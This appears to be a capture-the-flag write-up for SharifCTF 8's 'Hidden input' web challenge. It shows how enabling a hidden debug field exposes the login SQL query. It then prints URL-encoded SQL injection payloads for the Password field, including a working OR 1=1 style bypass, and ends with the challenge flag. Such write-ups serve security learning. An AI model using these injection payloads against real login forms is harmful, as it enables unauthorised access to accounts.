Information#
Version#
By | Version | Comment |
---|---|---|
noraj | 1.0 | Creation |
CTF#
- Name : SharifCTF 8
- Website : ctf.certcc.ir
- Type : Online
- Format : Jeopardy
- CTF Time : link
50 - Hidden input - Web#
Login if you can :)
There is an hidden input:
1 | <form method="POST" action="login.php"> |
And change the debug
POST value to get: Username=admin&Password=pass&debug=1
.
This is showing us the SQL query used.
1 | username: admin |
First I think this payload should work but it didn't.
Username=admin%27%29--+-&Password=sdf&debug=0
1 | username: admin')-- - |
Comment doesn't seem to work so let's generate a fully working querry:
Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1
1 | username: admin |
Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}